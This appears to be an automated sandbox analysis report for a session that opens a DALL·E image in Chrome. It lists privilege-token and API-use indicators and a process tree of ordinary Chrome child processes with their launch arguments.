Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: 33	4092	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4092	AUDIODG.EXE
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe
Token: SeShutdownPrivilege	1180	chrome.exe
Token: SeCreatePagefilePrivilege	1180	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
3280	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1180	chrome.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
692	MiniSearchHost.exe
2784	WindowsTerminal.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
376	mmc.exe
1384	Code.exe
1384	Code.exe
4824	chrome.exe
4824	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3280 wrote to memory of 736	3280	chrome.exe	82
PID 3280 wrote to memory of 736	3280	chrome.exe	82
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 764	3280	chrome.exe	83
PID 3280 wrote to memory of 1096	3280	chrome.exe	84
PID 3280 wrote to memory of 1096	3280	chrome.exe	84
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85
PID 3280 wrote to memory of 1088	3280	chrome.exe	85

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument "C:\Users\Admin\AppData\Local\Temp\DALL·E 2025-03-06 10.16.38 - A beautiful night scene celebrating Ramadan. In the foreground, a grou.webp"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffdeef2cc40,0x7ffdeef2cc4c,0x7ffdeef2cc58
  2⤵
  PID:736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1836 /prefetch:2
  2⤵
  PID:764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:1096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2204 /prefetch:8
  2⤵
  PID:1088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3012,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3028 /prefetch:1
  2⤵
  PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3024,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4272 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3264,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3304,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3292 /prefetch:8
  2⤵
  PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3320,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4376,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4316 /prefetch:8
  2⤵
  PID:4192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3284,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3020,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:8
  2⤵
  PID:4544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4444,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:8
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4884,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:2
  2⤵
  PID:2408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4848,i,722515515097170577,14927365612449705946,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:3868

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdeef2cc40,0x7ffdeef2cc4c,0x7ffdeef2cc58
  2⤵
  PID:4512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:2664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1712,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=2076 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:3388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3128 /prefetch:1
  2⤵
  PID:2716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4592 /prefetch:8
  2⤵
  PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  PID:2748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4688,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4664 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4360,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5000 /prefetch:1
  2⤵
  PID:2532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4380,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3164 /prefetch:8
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4488,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3364 /prefetch:8
  2⤵
  PID:2008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5132,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4832,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=2716 /prefetch:1
  2⤵
  PID:2408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3524,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5576,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=3756 /prefetch:8
  2⤵
  PID:1760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5664 /prefetch:8
  2⤵
  PID:3708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5772,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5304,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:1228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5512,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=2996 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5540,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:4228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5888,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5876,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6024 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6184,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6196 /prefetch:8
  2⤵
  PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6228,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5544,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6048,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:3340
- C:\Program Files\Google\Chrome\Application\chrome.exe
